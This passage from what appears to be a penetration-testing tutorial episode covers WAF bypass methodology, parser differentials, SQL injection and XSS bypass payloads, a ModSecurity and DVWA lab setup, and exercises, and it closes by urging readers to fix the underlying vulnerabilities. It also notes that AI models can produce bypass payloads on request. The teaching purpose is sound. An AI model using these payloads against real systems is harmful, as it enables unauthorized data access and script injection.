python3 waf_bypass.py "1' UNION SELECT user,password FROM users-- -"

# Test against ModSecurity in your lab
python3 waf_bypass.py http://192.168.56.101/dvwa/vulnerabilities/sqli/ id \
  "1' UNION SELECT user,password FROM users-- -" --verbose

WAF Testing Methodology

When you encounter a WAF during a pentest, follow this systematic approach:

1. IDENTIFY the WAF
   - Run wafw00f
   - Check response headers
   - Trigger a block and examine the error page
   - Note: if it's a cloud WAF, check for origin IP bypass FIRST

2. BASELINE the rules
   - Send known-good requests, confirm they pass
   - Send known-bad requests, confirm they're blocked
   - Document the baseline: what gets through, what doesn't

3. ENUMERATE the ruleset
   - Test individual keywords: UNION, SELECT, <script>, alert(
   - Which keywords trigger blocks? Which are allowed?
   - Are blocks based on keywords alone or combinations?
   - Is the detection case-sensitive?

4. FIND gaps
   - Test encoding variants (URL, double, hex, Unicode)
   - Test keyword alternatives (SQL synonyms, JS event handlers)
   - Test HTTP-level bypasses (HPP, chunking, content-type)
   - Test each bypass technique independently first

5. CHAIN bypasses
   - Combine techniques that individually work
   - Example: case alternation + comment injection + hex strings
   - Each layer of encoding reduces the payload's similarity
     to known signatures

6. VERIFY exploitation
   - A bypass that gets through the WAF is only useful if the
     underlying vulnerability is exploitable with that encoding
   - Test the bypass against the actual vulnerability, not just
     WAF passthrough

7. DOCUMENT everything
   - Which WAF, which version/ruleset
   - Which bypasses worked
   - Which payloads successfully exploited the vulnerability
   - Remediation: fix the underlying vuln, don't rely on WAF tuning
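
Step 3 (enumerating the ruleset) is the one that benefits most from a little automation. A minimal sketch, assuming you supply your own `is_blocked` function: in a real test it would send the probe through the WAF and check the status code, here a made-up `fake_waf` stands in so the example runs offline.

```python
from typing import Callable

def enumerate_rules(probes: list[str],
                    is_blocked: Callable[[str], bool]) -> dict[str, list[str]]:
    """Sort probe strings into blocked/allowed according to is_blocked."""
    report: dict[str, list[str]] = {"blocked": [], "allowed": []}
    for probe in probes:
        report["blocked" if is_blocked(probe) else "allowed"].append(probe)
    return report

def fake_waf(value: str) -> bool:
    """Stand-in for a live probe (assumption: case-sensitive keyword rules)."""
    return any(word in value for word in ("UNION", "<script>"))

if __name__ == "__main__":
    probes = ["UNION", "union", "SELECT", "<script>", "<ScRiPt>"]
    report = enumerate_rules(probes, fake_waf)
    print("Blocked:", report["blocked"])
    print("Allowed:", report["allowed"])
```

Reading the two lists side by side answers the questions from step 3 directly: which keywords trigger on their own, and whether the matching is case-sensitive.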

The Fundamental Problem with WAFs

Here we go -- this is the part that matters most.

WAFs try to understand SQL, HTML, JavaScript, and XML syntax by pattern matching HTTP parameters. But they are NOT actual parsers for those languages. They are approximations. The MySQL parser is the definitive authority on what constitutes valid MySQL syntax. The browser's HTML parser is the definitive authority on what constitutes renderable HTML. The Python/PHP/Java runtime is the definitive authority on what constitutes executable code.

When the WAF's approximation disagrees with the actual parser -- and it WILL disagree, because the actual parsers are enormously complex with decades of edge cases, legacy behaviors, and implementation-specific quirks -- the attacker exploits the disagreement. The WAF says "this doesn't look like SQL injection." The MySQL parser says "this is perfectly valid SQL." Both are correct, from their own perspective. The attacker wins because the WAF's perspective doesn't matter -- only the database's perspective does.

This is sometimes called the parser differential problem, and it's the reason WAFs are fundamentally limited as a security control. No WAF can ever be as accurate as the parser it's protecting, because to be that accurate it would need to BE that parser -- at which point it's just the application itself.
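
You can watch a parser differential happen with nothing but the standard library. In this sketch SQLite stands in for the production database (an assumption made so the example runs anywhere; MySQL also accepts a comment in place of whitespace), and `waf_allows` is a hypothetical regex signature.

```python
import re
import sqlite3

SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)

def waf_allows(sql_fragment: str) -> bool:
    """Hypothetical WAF rule: UNION, whitespace, SELECT."""
    return SIGNATURE.search(sql_fragment) is None

def run(query: str) -> list[tuple]:
    """Execute the query on a throwaway in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    try:
        return conn.execute(query).fetchall()
    finally:
        conn.close()

if __name__ == "__main__":
    for query in ("SELECT 1 UNION SELECT 2", "SELECT 1 UNION/**/SELECT 2"):
        print(f"{query!r}: WAF allows={waf_allows(query)}, rows={run(query)}")
```

Both queries return the same rows. Only one of them looks like a UNION SELECT to the regex, and the database never asked the regex for its opinion.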

The WAF tries to understand SQL. The database already understands SQL.

Real-world examples of parser differentials:

# MySQL supports C-style comments with version markers:
SELECT /*!50000 user,password*/ FROM users
# This is valid SQL that executes the commented code on MySQL >= 5.0
# The WAF sees a comment and ignores the content

# PostgreSQL dollar-sign quoting:
SELECT $tag$<script>alert(1)</script>$tag$
# This is a valid string literal in PostgreSQL
# The WAF doesn't recognize $tag$ as a quote delimiter

# MySQL backtick identifiers:
SELECT `user`,`password` FROM `users`
# Backticks are MySQL-specific identifier quotes
# Some WAFs don't recognize backtick-quoted identifiers

# JavaScript template literals:
<img src=x onerror=alert`1`>
# Backtick invocation works in modern browsers
# Many WAFs only look for parentheses after function names

Real-World WAF Bypass Case Studies

Cloudflare bypass (2019): Researchers discovered that Cloudflare's WAF could be bypassed using the globalThis object in JavaScript:

<svg onload=globalThis[`al`+`ert`](1)>

Cloudflare's rules looked for alert(, prompt(, confirm( as XSS signatures. Using bracket notation with string concatenation to call the function avoided all signatures. Cloudflare patched this specific bypass within days, but the cat-and-mouse game continues -- new bypasses are found regularly.

AWS WAF bypass via Unicode normalization (2020): AWS WAF didn't normalize Unicode before inspection, but the application (running on .NET) did. Sending ＜script＞alert(1)＜/script＞ (using fullwidth Unicode characters U+FF1C and U+FF1E instead of regular < and >) passed through AWS WAF because the Unicode chars didn't match the <script> signature. The .NET application normalized them to ASCII angle brackets and the XSS fired.
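
The normalization step is easy to reproduce. The sketch below uses Python's NFKC normalization as a stand-in for whatever character mapping the backend applies (an assumption; .NET's exact conversion rules differ in detail), and `waf_allows` is a hypothetical signature check on the raw value.

```python
import unicodedata

def waf_allows(value: str) -> bool:
    """Hypothetical WAF: looks for a literal ASCII <script> tag."""
    return "<script>" not in value.lower()

def app_normalizes(value: str) -> str:
    """Stand-in for the backend folding fullwidth characters to ASCII."""
    return unicodedata.normalize("NFKC", value)

if __name__ == "__main__":
    # U+FF1C and U+FF1E are the fullwidth forms of < and >.
    payload = "\uff1cscript\uff1ealert(1)\uff1c/script\uff1e"
    print("WAF allows raw payload:", waf_allows(payload))
    print("After normalization:   ", app_normalizes(payload))
```

The fix on the WAF side is to normalize before matching, which is the same lesson as with URL decoding: inspect the data in the form the application will finally see.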

ModSecurity CRS bypass via multipart (2021): The OWASP Core Rule Set for ModSecurity had a parsing gap in multipart/form-data processing. By crafting specific boundary strings and content-disposition headers, the payload could be placed in a section that ModSecurity's parser skipped but the application's parser processed.

Every one of these bypasses was eventually patched. And every patch was followed by new bypasses. This is the cycle: researchers find gaps between the WAF parser and the application parser, the WAF vendor patches the gap, the gap reappears in a different form because the underlying parser differential problem hasn't changed. The WAF is fighting an endless approximation battle against parsers that define reality.

Setting Up ModSecurity for Lab Practice

You should test bypass techniques against a real WAF in your lab, not against production systems. Here's how to set up ModSecurity with the OWASP Core Rule Set (CRS) in Docker:

# Pull the official ModSecurity + CRS Docker image
docker pull owasp/modsecurity-crs:apache

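# Run with DVWA as the backend
# (--add-host makes host.docker.internal resolve on Linux hosts such as Kali)
docker run -d --name modsec-waf \
  --add-host=host.docker.internal:host-gateway \
  -p 8080:80 \
  -e BACKEND=http://host.docker.internal:42001 \
  -e PARANOIA=1 \
  owasp/modsecurity-crs:apache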

# PARANOIA levels:
# 1 = minimal false positives, basic protection (default)
# 2 = moderate -- blocks more attacks, some false positives
# 3 = aggressive -- blocks most attacks, more false positives
# 4 = paranoid -- blocks almost everything, many false positives

# Start DVWA, the backend the WAF proxies to (published on host port 42001)
docker run -d --name dvwa -p 42001:80 vulnerables/web-dvwa

# Now access DVWA through the WAF at http://localhost:8080
# Direct access at http://localhost:42001 bypasses the WAF (for comparison)

With this setup you can test payloads through the WAF (port 8080) and directly against DVWA (port 42001). If a payload gets blocked by the WAF, try your bypass variants. If a variant gets through the WAF AND exploits the vulnerability in DVWA, you've confirmed a working WAF bypass.
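The comparison workflow can be sketched as a few small helpers. This is a rough sketch, not a finished tool: the function names are hypothetical, the block codes are simply the ones commonly used to signal a WAF block (403/406/429), and `probe` assumes the lab ports from the Docker setup above. DVWA also requires a logged-in session, so you would pass your own session cookies.

```python
WAF_URL = "http://localhost:8080"      # through ModSecurity (lab setup above)
DIRECT_URL = "http://localhost:42001"  # straight to DVWA, no WAF

BLOCK_CODES = {403, 406, 429}  # assumption: status codes treated as "blocked"


def classify(status_code):
    """Map an HTTP status code to a coarse verdict."""
    if status_code in BLOCK_CODES:
        return "BLOCKED"
    if status_code == 200:
        return "PASSED"
    return "ERROR"


def verdict(waf_status, direct_status):
    """Combine both observations into one line for your lab notes."""
    waf, direct = classify(waf_status), classify(direct_status)
    if direct != "PASSED":
        return "inconclusive: backend did not answer 200 directly"
    if waf == "BLOCKED":
        return "blocked by WAF: try a bypass variant"
    if waf == "PASSED":
        return "passed WAF: now check the response body for exploitation"
    return "inconclusive: unexpected WAF response"


def probe(path, params, cookies=None):
    """Send the same request via the WAF and directly; return both status codes."""
    import requests  # imported lazily so the helpers above work without it

    waf = requests.get(WAF_URL + path, params=params, cookies=cookies, timeout=10)
    direct = requests.get(DIRECT_URL + path, params=params, cookies=cookies, timeout=10)
    return waf.status_code, direct.status_code


# Example (lab only; supply the cookies from your own DVWA session):
# print(verdict(*probe("/vulnerabilities/sqli/",
#                      {"id": "1' OR '1'='1", "Submit": "Submit"},
#                      cookies={"PHPSESSID": "...", "security": "low"})))
```

Note that a 200 through the WAF only tells you the request was not blocked. Whether the payload actually fired still has to be confirmed in the response body.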

The AI Slop Connection

Coming back to the thread from episode 6. WAF bypass actually has a unique relationship with AI-generated code, and it works both ways.

On the defense side: AI-generated web applications almost never deploy with a WAF, because WAFs are infrastructure configuration and AI models generate application code. Ask an AI to "build a web application with user login" and it produces the Flask/Express/Django app with the SQL injection in the login query. It does NOT produce the nginx config, the ModSecurity rules, the Cloudflare setup, or the AWS WAF policy. The application launches vulnerable with zero protection between it and the internet.

On the attack side: AI models are getting good at generating WAF bypass payloads. They've been trained on a large body of public WAF bypass research, CTF writeups, and security conference presentations. An attacker can ask for "SQL injection payloads that bypass ModSecurity CRS level 2" and often get usable variants. This means the barrier to WAF bypassing is dropping -- it's no longer just expert pentesters who can bypass WAFs, it's anyone with access to a chat interface. The defense implication: if AI can generate bypasses, the WAF alone is even less reliable as a security boundary than it was before.

Having said that, the correct response to "WAF bypasses are getting easier" is NOT "use a better WAF." It's "fix the underlying vulnerabilities." A WAF is a compensating control -- a temporary measure while you fix the real problem. The SQL injection in your login query doesn't become less dangerous because a WAF sits in front of it. It becomes slightly harder to exploit. "Slightly harder" is not a security strategy ;-)
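What "fix the underlying vulnerability" looks like for a login query, as a minimal sketch using Python's built-in sqlite3 module. The table layout and function names are hypothetical, and the stored value is a placeholder rather than a real password hash.

```python
import sqlite3

# In-memory database with one hypothetical user (illustration only).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "not-a-real-hash"))


def login_vulnerable(username, password_hash):
    """String concatenation: user input becomes part of the SQL itself."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password_hash = '" + password_hash + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_fixed(username, password_hash):
    """Parameterized query: user input is only ever treated as data."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone()[0] > 0


injection = "admin' --"  # comments out the password check in the vulnerable query

print(login_vulnerable(injection, "wrong"))  # True
print(login_fixed(injection, "wrong"))       # False
```

With the parameterized version there is nothing left for a WAF bypass to reach: however the payload is encoded on the way in, it arrives at the database as a plain string value.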

The wall is getting thinner. Repair the house.

Exercises

Exercise 1: Set up ModSecurity with OWASP CRS in your lab using the Docker instructions from this episode. Configure it with PARANOIA=1 (default). Test 10 SQL injection payloads from episodes 12-13 through the WAF and directly against DVWA (bypassing the WAF). Document which ones are blocked and which pass through. Then apply encoding bypass techniques (URL encoding, double encoding, comment injection, case alternation) and test again. How many previously-blocked payloads now succeed through the WAF? Increase PARANOIA to 2 and repeat -- do the same bypasses still work?

Exercise 2: Write a Python script called waf_tester.py that takes a URL, a parameter name, and a base payload. It should: (a) generate all bypass variants using the generator from this episode, (b) send each variant to the target URL, (c) classify each response as BLOCKED (403/406/429), PASSED (200), or ERROR, (d) for variants that PASSED, check the response body for indicators that the vulnerability was triggered (SQL error messages like "syntax error" or "mysql", reflected XSS content, etc.), (e) produce a summary report showing which variants bypassed the WAF and which actually exploited the underlying vulnerability. Test it against your ModSecurity + DVWA lab setup.

Exercise 3: Research three major cloud WAF providers (Cloudflare, AWS WAF, Akamai). For each one, document: the detection methods used (signature, behavioral, ML), what the default/managed ruleset covers, how custom rules are configured, known public bypass techniques that have been disclosed (check security conference talks and research papers), and the pricing model. Write your comparison in ~/lab-notes/waf-comparison.md. Based on your research: which WAF would be hardest to bypass during a pentest, and why?

A WAF is a guard. Not a wall. And guards sometimes sleep.

@scipio
